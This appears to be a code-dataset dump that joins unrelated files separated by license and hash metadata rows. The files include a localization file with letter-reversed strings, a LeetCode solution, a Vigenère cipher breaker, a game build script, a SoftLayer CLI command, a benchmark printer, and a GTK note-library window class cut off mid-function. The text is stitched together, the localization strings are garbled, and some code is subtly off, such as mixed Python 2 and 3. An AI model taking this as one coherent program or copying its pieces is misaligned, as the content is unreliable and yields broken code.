meta_child_count = "Evitca Stniopdne"
meta_child_ratio = "Elor (0=tneilc, 1=revres)"
login_LDAP_missing = "PADL eludom ton dellatsni. Tonnac mrofrep nigol.."
login_LDAP_error = "Dluoc ton tcennoc ot PADL revres: {}. Kcehc noitarugifnoc."
login_blank_pass = "Drowssap yam ton eb knalb."
login_blank_user = "Resu yam ton eb knalb."
login_invalid = "Dilavni slaitnederc."
login_failed = "Nigol deliaf."
| gpl-3.0 | 1,502,175,834,318,290,400 | 31.295455 | 82 | 0.701619 | false | 2.196291 | false | true | false |
glottobank/pycldf | tests/test_paralleltext.py | 1 | 1119 | from pathlib import Path
import pytest
from pycldf.dataset import ParallelText
@pytest.fixture
def ds(tmpdir):
ds = ParallelText.in_dir(str(tmpdir))
ds.add_component('FunctionalEquivalentTable')
ds.add_component('FunctionalEquivalentsetTable')
for fname in [
'forms.csv',
'functionalEquivalents.csv',
'functionalEquivalentsets.csv',
]:
src = Path(__file__).parent / 'data' / 'paralleltext_{0}'.format(fname)
target = tmpdir.join(fname)
target.write(src.read_text(encoding='utf-8').encode('utf8'), mode='wb')
return ds
def test_paralleltext(ds):
ds.validate()
assert len(list(ds[ds.primary_table])) == 9
def test_get_equivalent(ds):
for fes in ds['FunctionalEquivalentsetTable']:
if fes['Description'] == 'Jesus Christ':
break
else:
raise ValueError # pragma: no cover
equiv = [
ds.get_equivalent(r) for r in ds['FunctionalEquivalentTable']
if r['FunctionalEquivalentset_ID'] == fes['ID']]
assert equiv == [['Jesu'], ['Jisas\u0268', 'Kiraisoy\xe1'], ['Jisas', 'Krais']]
| apache-2.0 | -6,987,609,921,863,617,000 | 27.692308 | 83 | 0.636282 | false | 3.380665 | false | false | false |
gengwg/leetcode | 112_path_sum.py | 1 | 1183 | # 112. Path Sum
# Given a binary tree and a sum,
# determine if the tree has a root-to-leaf path
# such that adding up all the values along the path equals the given sum.
#
# For example:
# Given the below binary tree and sum = 22,
# 5
# / \
# 4 8
# / / \
# 11 13 4
# / \ \
# 7 2 1
#
# return true, as there exist a root-to-leaf path 5->4->11->2 which sum is 22.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def hasPathSum(self, root, sum):
if root is None:
return False
# leaf node
if root.left is None and root.right is None and root.val == sum:
return True
# reduce sum by node value at each recursion
return self.hasPathSum(root.left, sum - root.val) or self.hasPathSum(root.right, sum - root.val)
if __name__ == "__main__":
root = TreeNode(5)
root.left = TreeNode(4)
root.right = TreeNode(8)
root.left.left = TreeNode(11)
root.left.left.right = TreeNode(2)
print Solution().hasPathSum(root, 22)
| apache-2.0 | -5,073,569,330,014,601,000 | 25.288889 | 104 | 0.556213 | false | 3.399425 | false | false | false |
RokKos/FRI_Programiranje | TTK/DN01/Vigenere.py | 1 | 3509 | from string import ascii_lowercase
from math import gcd
# Constants
kN = len(ascii_lowercase)
kStartAscii = ord(ascii_lowercase[0])
kFILE_NAME = "TheHitchhikersGuidetotheGalaxy.txt"
# Helpers
def AsciiValue(char):
return ord(char) - kStartAscii
def CharValue(num):
return chr(num + kStartAscii)
def TransformText(original, key, add_sub):
text = ""
for idx,val in enumerate(original):
lowr = val.lower()
ascii_num = AsciiValue(lowr)
i = idx % len(key)
ascii_num += add_sub * AsciiValue(key[i])
ascii_num %= kN
text += CharValue(ascii_num)
return text
def Encrypt(b,k):
return TransformText(b,k, 1)
def Decrypt(c, k):
return TransformText(c,k, -1)
def AllDivisors(num):
divisors = [3]
i = 4
while i*i <= num:
if (num % i == 0):
divisors.append(i)
i += 1
return divisors
def PossibleLen(num):
return list(range (3, num // 2))
def FindLenghtOfKey(cripted_text):
ct_len = len(cripted_text)
possible_pattern_search = AllDivisors(ct_len)
#print (possible_pattern_search)
distances = []
for patter_len in possible_pattern_search:
upper_bound = ct_len if ct_len % patter_len == 0 else ct_len - patter_len
for i in range(0,upper_bound, patter_len):
for j in range(i + patter_len, upper_bound, patter_len):
matching = True
for k in range(patter_len):
#print (i,j,k, patter_len, ct_len)
if (cripted_text[i+k] != cripted_text[j+k]):
matching = False
break
if (matching):
distances.append(j - i - patter_len)
print (distances)
l_d = len(distances)
gcd_distances = distances[0]
if (l_d >= 2):
for d in range(1, l_d):
gcd_distances = gcd(gcd_distances, distances[d])
return gcd_distances
def BreakTextIntoBlocks(text, lengh_of_blocks):
blocks = ["" for _ in range(lengh_of_blocks)]
for ind, val in enumerate(text):
blocks[ind % lengh_of_blocks] += val
return blocks
def FrequencyAnalysis(cripted_text):
frequencies = [0 for _ in range(kN)]
for c in cripted_text:
frequencies[AsciiValue(c)] += 1
print (frequencies)
return frequencies
def FindKey(cripted_text):
key_len = FindLenghtOfKey(cripted_text)
text_blocks = BreakTextIntoBlocks(cripted_text, key_len)
key = ""
for block in text_blocks:
freq = FrequencyAnalysis(block)
print (CharValue(freq.index(max(freq))))
char_from_key = abs(freq.index(max(freq)) - AsciiValue('t'))
key += CharValue(char_from_key)
return key
if __name__ == "__main__" :
#print (Encrypt("abc", "abc"))
#print (Encrypt("abc", "z"))
#print (Encrypt("abc", "y"))
#print (Decrypt("ace", "abc"))
#print (Decrypt("zab", "z"))
#print (Decrypt("yza", "y"))
#print (FindLenghtOfKey(Encrypt("abcijkabcoplabc", "abc")))
#print (FindLenghtOfKey(Encrypt("abcijkabcoplabce", "abcd")))
#print (FindKey(Encrypt("abcijkabcoplabc", "abc")))
content = ""
with open(kFILE_NAME) as f:
content = f.readlines()
#print(content)
cripted_text = Encrypt(content[0], "abc")
key = FindKey(cripted_text)
print (key)
original = Decrypt(cripted_text, key)
print (original)
print (content[0].lower())
print (content[0].lower() == original)
| mit | -6,810,865,207,348,621,000 | 26.629921 | 81 | 0.591052 | false | 3.204566 | false | false | false |
gusmaogabriels/mkin4py | mkin4py/solver/linsolver.py | 1 | 2121 | # -*- coding: utf-8 -*-
from __future__ import division, absolute_import, print_function
from . import np as __np, linalg as __linalg, derivatives as __derivatives
from .params import convergence_params
from ..bases import mkmodel as __mk
def newton_type(param):
""" lin_solver
params(1) : param as int
param = 1 -> Jacobian solution
param = 2 -> returns param = 1 and Hessian Matrix
"""
psi, jacobian, hessian = __derivatives.analytical(param)
jacobian = __np.dot(__mk.maps['msas'],jacobian).T
f = __np.dot(__mk.maps['msas'],psi)
# add white noise to the Jacobian with std of the linear problem solver converfence criteria
#jacobian += __np.random.normal(0,convergence_params['criteriaqmr'],jacobian.shape)
# solution algorithm
dcoverage = __np.array(__linalg.qmr(jacobian.T,-f*convergence_params['hfun'],\
tol = convergence_params['inner_criteria'],maxiter=convergence_params['inner_convtol'])[0])
if param == 2 and max(abs(dcoverage))<1:
count = 0
fhessp = lambda dconv,M : __np.dot(M.T,dconv)
dhess = __np.empty([len(psi),len(__mk.xsurface)])
vhess = __np.empty([len(psi),1])
while count <= convergence_params['convtolH']:
for i in range(0,len(psi)):
dhess[i,:] = fhessp(dcoverage,hessian[:,:,i])
vhess[i,:] = __np.dot(dhess[i,:],dcoverage)
mhess = __np.dot(__mk.maps['msas'],dhess).T
vhess = __np.dots(__mk.maps['msas'],vhess)
dcoverage2 = __np.array(__linalg.qmr((jacobian+mhess).T,\
-(f+__np.dot(jacobian.T,dcoverage)+0.5*vhess)))[0]
dcoverage += dcoverage2
count+=1
else:
pass
for i in range(len(dcoverage)):
if __np.isnan(dcoverage[i]):
dcoverage[i] = convergence_params['delta_min']
elif __np.isinf(dcoverage[i]):
if dcoverage[i]>0:
dcoverage[i] = convergence_params['delta_min']
else:
dcoverage[i] = -convergence_params['delta_min']
else:
pass
return dcoverage
| mit | -4,942,007,584,744,219,000 | 42.285714 | 96 | 0.584158 | false | 3.460033 | false | false | false |
KatsuomiK/HTML5Shooter | build/build.py | 1 | 2556 | #! /usr/bin/python
import os
import base64
def list_files(dir):
list = []
for root, dirs, files in os.walk(dir):
for file in files:
fullpath = os.path.join(root, file).replace("\\", "/")
list.append(fullpath)
return list
def remove_files(list, files):
for file in files:
if file in list:
list.remove(file)
def convert_image_files(output_file, image_files, property):
if len(image_files) > 0:
output = "var " + property + " = {\n"
for file in image_files:
print(file)
id = file.replace("./", "")
fin = open(file, "rb")
binary = fin.read()
fin.close()
output += '\t"' + id + '" : "data:image/png;base64,' + base64.b64encode(binary).decode('ascii') + '",\n'
output = output[0:-2]
output += "\n};\n"
with open(output_file, "w") as fout:
fout.write(output)
def concat_files(output_file, in_files):
with open(output_file, "w", encoding='utf-8') as fout:
for file in in_files:
print(file)
with open(file, encoding='utf-8') as fin:
src = fin.read()
fout.write(src)
PROJECT_JS = "build/bin/HTML5Shooter.js"
PROJECT_OPTIMIZED_JS = "build/bin/HTML5Shooter-min.js"
SOURCE_MAP_JS = "build/bin/HTML5Shooter-min.js.map"
# create gamelib.js
GAMELIB_JS = "build/bin/gamelib.js"
GAMELIB_HEADER = "gamelib/header.js"
os.chdir("..")
gamelib_files = list_files("gamelib")
remove_files(gamelib_files, [GAMELIB_HEADER])
gamelib_files = [GAMELIB_HEADER] + gamelib_files
concat_files(GAMELIB_JS, gamelib_files)
# create images.js
IMAGES_JS = "build/obj/images.js"
os.chdir('resources/images');
image_files = list_files('.')
convert_image_files("../../" + IMAGES_JS, image_files, 'IMAGES');
os.chdir("../../");
# create project .js
files = [GAMELIB_JS, IMAGES_JS] + list_files("src")
concat_files(PROJECT_JS, files)
# create optimized project .js
#compiler = "java -jar build/compiler.jar --compilation_level ADVANCED_OPTIMIZATIONS --js " + PROJECT_JS + " --js_output_file " + PROJECT_OPTIMIZED_JS + " --create_source_map " + SOURCE_MAP_JS + " --source_map_format=V3"
#os.system(compiler)
optimize = "uglifyjs " + PROJECT_JS + " > " + PROJECT_OPTIMIZED_JS
os.system(optimize)
| mit | -1,062,201,311,078,490,500 | 23.306931 | 220 | 0.552817 | false | 3.235443 | false | false | false |
allmightyspiff/softlayer-python | SoftLayer/shell/cmd_help.py | 3 | 1103 | """Print help text."""
# :license: MIT, see LICENSE for more details.
import click
from click import formatting
from SoftLayer.CLI import core as cli_core
from SoftLayer.CLI import environment
from SoftLayer.shell import routes
@click.command()
@environment.pass_env
@click.pass_context
def cli(ctx, env):
"""Print shell help text."""
env.out("Welcome to the SoftLayer shell.")
env.out("")
formatter = formatting.HelpFormatter()
commands = []
shell_commands = []
for name in cli_core.cli.list_commands(ctx):
command = cli_core.cli.get_command(ctx, name)
if command.short_help is None:
command.short_help = command.help
details = (name, command.short_help)
if name in dict(routes.ALL_ROUTES):
shell_commands.append(details)
else:
commands.append(details)
with formatter.section('Shell Commands'):
formatter.write_dl(shell_commands)
with formatter.section('Commands'):
formatter.write_dl(commands)
for line in formatter.buffer:
env.out(line, newline=False)
| mit | -4,125,463,605,830,137,300 | 26.575 | 53 | 0.663645 | false | 3.925267 | false | false | false |
imron/scalyr-agent-2 | benchmarks/scripts/print_compression_algorithm_results.py | 2 | 3953 | #!/usr/bin/env python
# Copyright 2014-2020 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Script which pretty prints benchmark results for compression algorithms benchmarks.
"""
from __future__ import absolute_import
from __future__ import print_function
import sys
import copy
import json
from io import open
from collections import defaultdict
from prettytable import PrettyTable # pylint: disable=import-error
def main():
with open(sys.argv[1], "r") as fp:
data = fp.read()
data = json.loads(data)
result = defaultdict(list)
print(("=" * 100))
print("Compression")
print(("=" * 100))
for benchmark in data["benchmarks"]:
if benchmark["group"] != "compress":
continue
name = benchmark["name"]
key = "=".join([str(x) for x in benchmark["params"]["log_tuple"]])
mean = benchmark["stats"]["mean"] * 1000
compression_ratio = round(benchmark["stats"]["compression_ratio"], 3)
result[key].append((benchmark["name"], mean, compression_ratio))
for key in result.keys():
values = result[key]
split = key.split("=")
print("")
print(("-" * 100))
print("")
print(("%s %s bytes (-1 means whole file)" % (split[0], split[1])))
print("")
print("Best by timing (less is better)")
print("")
table = PrettyTable()
table.field_names = [
"name",
"mean time in ms (less is better)",
"compression ratio (more is better)",
]
values1 = sorted(copy.copy(values), key=lambda x: x[1])
for name, mean, compression_ratio in values1:
table.add_row((name, mean, compression_ratio))
print(table)
print("")
print("Best by compression ratio (more is better)")
print("")
table = PrettyTable()
table.field_names = [
"name",
"mean time in ms (less is better)",
"compression ratio (more is better)",
]
values2 = sorted(copy.copy(values), key=lambda x: x[2], reverse=True)
for name, mean, compression_ratio in values2:
table.add_row((name, mean, compression_ratio))
print(table)
print("")
print(("=" * 100))
print("")
result = defaultdict(list)
print(("=" * 100))
print("Decompression")
print(("=" * 100))
for benchmark in data["benchmarks"]:
if benchmark["group"] != "decompress":
continue
name = benchmark["name"]
key = "=".join([str(x) for x in benchmark["params"]["log_tuple"]])
mean = benchmark["stats"]["mean"] * 1000
result[key].append((benchmark["name"], mean))
for key in result.keys():
values = result[key]
split = key.split("=")
print("")
print(("-" * 100))
print("")
print(("%s %s bytes (-1 means whole file)" % (split[0], split[1])))
print("")
print("Best by timing (less is better)")
print("")
table = PrettyTable()
table.field_names = ["name", "mean time in ms (less is better)"]
values1 = sorted(copy.copy(values), key=lambda x: x[1])
for name, mean in values1:
table.add_row((name, mean))
print(table)
print("")
print(("=" * 100))
print("")
if __name__ == "__main__":
main()
| apache-2.0 | 6,730,945,357,748,172,000 | 25.006579 | 83 | 0.571718 | false | 4.100622 | false | false | false |
alien3211/lom | Library_of_mind/WindowGTK.py | 1 | 30677 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import log
from MySQL import ConMySQL
from AddRowWindowGTK import AddRowWindowGTK
import csv
import os
from collections import deque, defaultdict
import gi
from gi.repository import Gtk as gtk
from gi.repository import Gdk
gi.require_version('Gtk', '3.0')
def css():
css = b"""
* {
transition-property: color, background-color, border-color, background-image, padding, border-width;
transition-duration: 1s;
}
/* font operate on entire GtkTreeView not for selected row */
GtkTreeView {
text-shadow: 1px 1px 2px black, 0 0 1em blue, 0 0 0.2em blue;
color: white;
font: 1.5em Georgia, "Bitstream Charter", "URW Bookman L", "Century Schoolbook L", serif;
font-weight: bold;
font-style: italic;box-shadow: 5px 3px red;}
GtkTreeView row:nth-child(even) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (#d0e4f7),
color-stop (0.5, darker (#d0e4f7)),
to (#fdffff));
}
GtkTreeView row:nth-child(odd) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (yellow),
color-stop (0.5, darker (yellow)),
to (#fdffff));
}
/* next line only border action operate */
GtkTreeView:selected{color: white; background: green; border-width: 1px; border-color: black;}
/* next line for Gtk.TreeViewColumn */
column-header .button{color: white; background: purple;}
* {
-GtkWindow-resize-grip-default: false;
}
"""
style_provider = gtk.CssProvider()
style_provider.load_from_data(css)
gtk.StyleContext.add_provider_for_screen(
Gdk.Screen.get_default(),
style_provider,
gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
)
WINDOW_WIDTH = 460
WINDOW_HEIGHT = 244
class Window():
def __init__(self, configData={}):
log.LOG("START __init__")
# set config data
self.configData = configData
self.configData['history_file'] = os.path.expanduser("~") + "/.lom_history"
self.configData['history'] = 50
self.configData['short'] = ['Title', 'Name', 'Keys']
self.configData['ip_MySQL'] = '172.19.20.19'
if not os.path.exists(self.configData['lomrc']):
self.setConfig()
if not os.path.exists(self.configData['history_file']):
with open(self.configData['history_file'], 'wb') as f:
f.write("")
self.getConfig()
# Set MySQL IP
ConMySQL.ip = self.configData['ip_MySQL']
# Parse glade XML
self.gladefile = os.path.dirname(os.path.abspath(__file__)) + "/glade/MainWindow.glade"
self.glade = gtk.Builder()
self.glade.add_from_file(self.gladefile)
self.glade.connect_signals(self)
# get object
self.component = {}
self.component['set'] = {}
self.component['search'] = gtk.ListStore(int, str, str, str, str, str, str)
self.component['update'] = gtk.ListStore(int, str, str, str)
self.component['add'] = {}
self.component['type'] = gtk.TreeStore(str, int)
self.component['news'] = gtk.ListStore(int, str, str, str, str, str, str)
self.component['keys'] = gtk.ListStore(str)
self.component['history'] = gtk.ListStore(int, str)
self.window = self.glade.get_object("window")
self.gridMain = self.glade.get_object("gridMain")
self.entryCommandLine = self.glade.get_object("entryCommandLine")
self.labelTitle = self.glade.get_object("labelTitle")
self.labelText = None
self.treeViewResult = None
# set up history command
self.history = deque(maxlen=int(self.configData['history']))
self.histpos = 0
self.getHisoryFromFile()
# initial window
self.initialWindow()
# show all object
self.window.show_all()
# check info
self.initialInfo()
log.LOG("END __init__")
def setConfig(self):
log.LOG("START setConfig")
tmp = dict(filter(lambda x: not x[0].startswith('_'), self.configData.items()))
tmp['short'] = ' '.join(tmp['short'])
with open(self.configData['lomrc'], 'wb') as csvfile:
writer = csv.DictWriter(csvfile, tmp.keys())
writer.writeheader()
writer.writerow(tmp)
self.getConfig()
log.LOG("END setConfig")
def getConfig(self):
log.LOG("START getConfig")
with open(self.configData['lomrc']) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
for k, v in row.items():
self.configData[k] = v
self.configData['short'] = self.configData['short'].split()
log.LOG("END getConfig")
def initialInfo(self):
log.LOG("START initialInfo")
# get news
rows = ConMySQL.getNews(self.configData['user'])
if rows:
self.print_error_message("%d news from last check" % len(rows))
self.getNews()
log.LOG("END initialInfo")
def initialWindow(self):
log.LOG("START initialWindow")
self.window.add_events(Gdk.EventMask.BUTTON_PRESS_MASK)
self.window.set_gravity(Gdk.Gravity.SOUTH_EAST)
self.window.set_keep_above(True)
self.window.set_resizable(False)
self.window.set_decorated(False)
self.entryCommandLine.connect('key_press_event', self.__key_function)
self.commonLayout()
log.LOG("END initialWindow")
def __set_position(self, width=WINDOW_WIDTH, height=WINDOW_HEIGHT):
log.LOG("START __set_position")
(w, h) = width, height
x = int(Gdk.Screen.get_default().get_width() * int(self.configData['_x']))
y = int(Gdk.Screen.get_default().get_height() * int(self.configData['_y']))
# Set position Left-Button
log.LOG("(x,y) = (%s,%s) (w,h) = (%s,%s)" % (x, y, w, h))
self.window.move(x-w, y-h)
log.LOG("END __set_position")
def __key_function(self, entry, event):
log.LOG("START __key_function")
if event.keyval == Gdk.KEY_Return:
self.entryCommandLine.emit_stop_by_name('key_press_event')
elif event.keyval in (Gdk.KEY_KP_Up, Gdk.KEY_Up, Gdk.KEY_Page_Up):
self.entryCommandLine.emit_stop_by_name('key_press_event')
self.historyUp()
elif event.keyval in (Gdk.KEY_KP_Down, Gdk.KEY_Down, Gdk.KEY_Page_Down):
self.entryCommandLine.emit_stop_by_name('key_press_event')
self.historyDown()
elif event.keyval in (Gdk.KEY_D, Gdk.KEY_d) and\
event.state & Gdk.ModifierType.CONTROL_MASK:
self.entryCommandLine.emit_stop_by_name('key_press_event')
self.setHisoryFile()
gtk.main_quit()
self.window.destroy()
log.LOG("END __key_function")
def historyDown(self):
log.LOG("START historyUp")
if self.histpos > 0:
self.entryCommandLine.set_text(self.history[self.histpos])
self.histpos = self.histpos - 1
log.LOG("END historyUp")
def historyUp(self):
log.LOG("START historyDown")
if self.histpos < len(self.history) - 1:
self.entryCommandLine.set_text(self.history[self.histpos])
self.histpos = self.histpos + 1
log.LOG("END historyDown")
def setHisoryFile(self):
with open(self.configData['history_file'], 'w') as f:
f.write('\n'.join(self.history))
def getHisoryFromFile(self):
with open(self.configData['history_file'], 'r') as f:
self.history = deque(maxlen=int(self.configData['history']))
for row in f.read().split('\n'):
self.history.append(row)
def print_error_message(self, text="fill all fields"):
log.LOG("START print_error_message")
md = gtk.MessageDialog(self.window, type=gtk.MessageType.ERROR, buttons=gtk.ButtonsType.OK)
md.set_position(gtk.WindowPosition.CENTER_ON_PARENT)
md.set_markup(text)
md.run()
md.destroy()
return None
log.LOG("END print_error_message")
def entry_dialog(self, message):
log.LOG("START entry_dialog")
dialog = gtk.MessageDialog(self.window, type=gtk.MessageType.QUESTION, buttons=gtk.ButtonsType.OK)
dialog.set_position(gtk.WindowPosition.CENTER_ON_PARENT)
dialog.set_markup(message)
dialogBox = dialog.get_content_area()
entry = gtk.Entry()
entry.set_size_request(200, 0)
dialogBox.pack_end(entry, False, False, 0)
dialog.show_all()
response = dialog.run()
text = entry.get_text()
dialog.destroy()
if (response == gtk.ResponseType.OK) and (text != ''):
return text
else:
return None
log.LOG("END entry_dialog")
def main(self):
log.LOG("START main")
"Run main loop"
gtk.main()
log.LOG("END main")
def deleteEvent(self, widget, event):
log.LOG("START deleteEvent")
gtk.main_quit()
log.LOG("END deleteEvent")
def parserArgs(self, widget):
log.LOG("START parserArgs")
arg = escapePattern(widget.get_text())
rest = arg.split()
self.histpos = 0
if rest and '\n' not in rest:
self.history.appendleft(arg)
command = rest.pop(0) if rest else ""
self.commonLayout()
if command in ['help', 'h']:
self.getHelp(rest)
elif command in ['set']:
self.setOption(rest)
elif command in ['search', 's']:
self.search(rest)
elif command in ['add', 'a']:
self.addParser(rest)
elif command in ['update', 'u']:
self.updateRecord(rest)
elif command in ['type', 't']:
self.getTypeTree(rest)
elif command in ['key', 'k']:
self.getKeysList(rest)
elif command in ['news', 'n']:
self.getNews()
elif command in ['history', 'his']:
self.getHisory()
elif command in ['open', 'o']:
self.openWebBrowser(rest)
elif command in ['exit', 'bye']:
self.setHisoryFile()
gtk.main_quit()
self.window.destroy()
elif command.isdigit():
self.getDigit(int(command))
log.LOG("END parserArgs")
def commonLayout(self):
log.LOG("START commonLayout")
self.labelTitle.set_text("Library Of Mind")
self.window.set_size_request(WINDOW_WIDTH, WINDOW_HEIGHT)
self.entryCommandLine.set_text("")
widget = self.gridMain.get_child_at(0, 1)
if widget is not None:
self.gridMain.remove(widget)
widget = self.gridMain.get_child_at(0, 2)
if widget is not None:
self.gridMain.remove(widget)
self.__set_position()
log.LOG("END commonLayout")
def labelLayout(self, text):
log.LOG("START labelLayout")
log.LOG("Create Scroll")
sw = gtk.ScrolledWindow()
sw.set_shadow_type(gtk.ShadowType.IN)
sw.set_size_request(450, 200)
sw.set_visible(True)
sw.set_policy(gtk.PolicyType.AUTOMATIC, gtk.PolicyType.AUTOMATIC)
self.gridMain.attach(sw, 0, 2, 1, 1)
log.LOG("(0,1): %s" % self.gridMain.get_child_at(0, 1))
self.labelText = gtk.Label()
self.labelText.set_markup(escape(text))
self.labelText.set_visible(True)
self.labelText.set_selectable(True)
self.labelText.props.valign = gtk.Align.START
self.labelText.props.halign = gtk.Align.START
sw.add(self.labelText)
self.__set_position()
log.LOG("END labelLayout")
def treeViewLayout(self, model, activatedRow, getSelectedRow, search_col=0):
"""
Create treeView
model -> GTK Storage
"""
log.LOG("START treeViewLayout")
self.commonLayout()
log.LOG("Create Scroll")
sw = gtk.ScrolledWindow()
sw.set_shadow_type(gtk.ShadowType.IN)
sw.set_size_request(450, 200)
sw.set_can_focus(True)
sw.set_visible(True)
sw.set_policy(gtk.PolicyType.AUTOMATIC, gtk.PolicyType.AUTOMATIC)
self.gridMain.attach(sw, 0, 1, 1, 1)
log.LOG("(0,1): %s" % self.gridMain.get_child_at(0, 1))
self.treeViewResult = gtk.TreeView()
self.treeViewResult.set_size_request(450, 200)
self.treeViewResult.set_visible(True)
self.treeViewResult.set_can_focus(True)
self.treeViewResult.set_model(model)
self.treeViewResult.set_search_column(search_col)
self.treeViewResult.connect("row-activated", activatedRow)
self.treeViewResult.connect("cursor-changed", getSelectedRow)
sw.add(self.treeViewResult)
self.__set_position()
log.LOG("END treeViewLayout")
def doNothing(*arg):
pass
def getSelectedRow(self, widget):
log.LOG("START getSelectedRow")
text_row = """
<span color="#929287">Title: </span><span>{1}</span>
<span color="#929287">Name: </span><span>{2}</span>
<span color="#929287">Description:</span>\n
<span>{4}</span>\n
<span color="#929287">Keys: </span><span>{3}</span>
<span color="#929287">Autor: </span><span weight="bold">{5}</span>\t<span color="#929287">Date: </span><span>{6}</span> """
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
wid = self.gridMain.get_child_at(0, 2)
if wid is not None:
self.gridMain.remove(wid)
self.labelLayout(text_row.format(*model[iter]))
self.__set_position(WINDOW_WIDTH, WINDOW_HEIGHT + 200 if self.configData['_size_200'] else 0)
self.labelTitle.set_text("Search --> %s" % model[iter][2])
log.LOG("END getSelectedRow")
def getSelectedRowType(self, widget, column, data):
log.LOG("START getSelectedRowType")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
type_name = str(model.get_value(iter, 0))
type_id = model.get_value(iter, 1)
typeData = ConMySQL.getTypeByTree()
child = (type_name, type_id)
id_type = ["-it", '[[:<:]]' + str(type_id) + '[[:>:]]']
for i in self.getIdFromTreeType(typeData, child):
id_type.extend(["-it", '[[:<:]]' + str(i) + '[[:>:]]'])
self.commonLayout()
self.search(id_type)
self.labelTitle.set_text("Type select --> %s" % type_name)
log.LOG("END getSelectedRowType")
def getExpandRow(self, widget):
log.LOG("START getExpandRow")
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
path = model.get_path(iter)
widget.expand_to_path(path)
log.LOG("END getExpandRow")
def getIdFromTreeType(self, typeData, parentName=('LOM', 1)):
log.LOG("START getIdFromTreeType")
list_id = []
if not typeData.get(parentName):
return list_id
else:
for child in typeData[parentName]:
list_id.append(child[1])
if typeData.get(child):
list_id.extend(self.getIdFromTreeType(typeData, child))
return list_id
log.LOG("END getIdFromTreeType")
def getSelectedRowKey(self, widget, column, data):
log.LOG("START getSelectedRowKey")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
key_name = str(model.get_value(iter, 0))
id_type = ["-k", '[[:<:]]' + key_name + '[[:>:]]']
self.commonLayout()
self.search(id_type)
self.labelTitle.set_text("Key select --> %s" % key_name)
log.LOG("END getSelectedRowKey")
def getSelectedHis(self, widget, column, data):
log.LOG("START getSelectedHis")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
self.commonLayout()
self.entryCommandLine.set_text(str(model.get_value(iter, 1)))
self.parserArgs(self.entryCommandLine)
log.LOG("END getSelectedHis")
def getSelectedUpdate(self, widget, column, data):
log.LOG("START getSelectedUpdate")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
id_row = model[iter][0]
self.commonLayout()
gtkWindowUpdateRow = AddRowWindowGTK(self.configData['user'], id_row)
gtkWindowUpdateRow.main()
self.labelTitle.set_text("Update select --> %s" % model[iter][1])
log.LOG("END getSelectedUpdate")
def getHelp(self, com):
log.LOG("START getHelp")
if com:
helpList = ConMySQL.getHelp(' '.join(com))[0]
if helpList['name'] == 'ALL':
helpList = '<span color="red">INVALID SYNTAX</span>\n' + helpList['description']
else:
helpList = helpList['description']
log.LOG("#### %s" % helpList)
self.labelLayout(helpList)
else:
helpList = ConMySQL.getHelp()[0]
helpList = helpList['description']
self.labelLayout(helpList)
self.labelTitle.set_text("Help --> %s" % ' '.join(com) or 'All')
log.LOG("END getHelp")
def search(self, com):
log.LOG("START search")
# helper fun
def checkRow(l, d, n):
log.LOG("%s %s %s" % (l, d, n))
t = []
while not l[0].startswith('-'):
t.append(l.pop(0))
if not l:
break
if not t:
return self.print_error_message("Invalid syntax")
else:
dPattern[n].append(' '.join(t))
# clean TreeStore
self.component['search'].clear()
# Parse com
dPattern = defaultdict(list)
if com:
if not com[0].startswith('-'):
pattern = ' '.join(com)
for name in ['name', 'type', 'description', 'key_list', 'name_a']:
dPattern[name].append(pattern)
else:
while com:
k = com.pop(0)
if com:
if k.lower() in ['-id', '-i']:
checkRow(com, dPattern, 'id')
elif k.lower() in ['-name', '-n ']:
checkRow(com, dPattern, 'name')
elif k.lower() in ['-type', '-t']:
checkRow(com, dPattern, 'type')
elif k.lower() in ['-description', '-desc', '-d']:
checkRow(com, dPattern, 'description')
elif k.lower() in ['-key', '-k']:
checkRow(com, dPattern, 'key_list')
elif k.lower() in ['-autor', '-a']:
checkRow(com, dPattern, 'name_a')
elif k.lower() in ['-id_type', '-it']:
checkRow(com, dPattern, 'id_type')
else:
return self.print_error_message("Invalid syntax")
if dPattern:
rows = ConMySQL.getLibDefaultDick(dPattern)
else:
rows = ConMySQL.getLib()
for row in rows:
toadd = [row['id'], row['type'], row['name'], row['key_list'], row['description'], row['name_a'], row['date_a'].strftime("%Y-%m-%d %T")]
self.component['search'].append(toadd)
# Create, TreeView Layout
self.treeViewLayout(self.component['search'], self.doNothing, self.getSelectedRow, 2)
# create columns
self.createColumns(self.treeViewResult, self.mapColumnNameToNumber(self.configData['short']))
self.labelTitle.set_text("Search --> %s" % (' '.join(com) if com else "All"))
log.LOG("END search")
def addRecord(self):
log.LOG("START addRecord")
gtkWindowAddRow = AddRowWindowGTK(self.configData['user'])
gtkWindowAddRow.main()
self.labelTitle.set_text("Add record")
log.LOG("END addRecord")
def addParser(self, com):
log.LOG("START addParser")
if com:
if com[0].startswith('-'):
if com[0] in ['-t', '-type']:
if len(com) == 2:
self.selectNewType(com[1])
else:
self.selectNewType()
else:
self.print_error_message("Invalid syntax More in <tt>help add</tt>")
else:
self.print_error_message("Invalid syntax More in <tt>help add</tt>")
else:
self.addRecord()
log.LOG("END addParser")
def selectNewType(self, new_type=None):
log.LOG("START selectNewType")
self.component['type'].clear()
typeData = ConMySQL.getTypeByTree()
# Show all type by pattern
if new_type:
types = ConMySQL.getType(new_type)
for type in types:
child = (type['type'], type['id_type'])
